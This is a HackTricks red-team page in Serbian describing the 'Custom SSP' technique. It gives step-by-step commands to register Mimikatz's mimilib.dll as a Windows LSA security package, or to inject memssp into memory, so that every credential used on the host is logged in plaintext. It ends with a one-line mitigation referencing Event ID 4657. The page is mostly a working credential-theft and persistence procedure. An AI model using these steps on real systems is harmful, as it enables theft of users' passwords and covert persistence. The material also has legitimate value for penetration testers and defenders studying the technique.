Custom SSP

Tip

Nauči i vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči i vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči i vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Pregledaj kompletan HackTricks Training katalog za assessment tracks (ARTA/GRTA/AzRTA) i Linux Hacking Expert (LHE).

Podrži HackTricks

Custom SSP

Learn what is a SSP (Security Support Provider) here.
Možete kreirati svoj SSP da zabeležite u čistom tekstu akreditive korišćene za pristup mašini.

Mimilib

Možete koristiti mimilib.dll binarni fajl koji pruža Mimikatz. Ovo će zabeležiti sve akreditive u čistom tekstu unutar fajla.
Postavite dll u C:\Windows\System32\
Dobijte listu postojećih LSA sigurnosnih paketa:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Dodajte mimilib.dll na listu provajdera za podršku bezbednosti (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

I nakon ponovnog pokretanja, sve akreditive možete pronaći u čistom tekstu u C:\Windows\System32\kiwissp.log

U memoriji

Takođe možete direktno injektovati ovo u memoriju koristeći Mimikatz (imajte na umu da može biti malo nestabilno/ne radi):

privilege::debug
misc::memssp

Ovo neće preživeti ponovna pokretanja.

Ublažavanje

Event ID 4657 - Revizija kreiranja/promene HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

Tip

Nauči i vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči i vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči i vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Pregledaj kompletan HackTricks Training katalog za assessment tracks (ARTA/GRTA/AzRTA) i Linux Hacking Expert (LHE).

Podrži HackTricks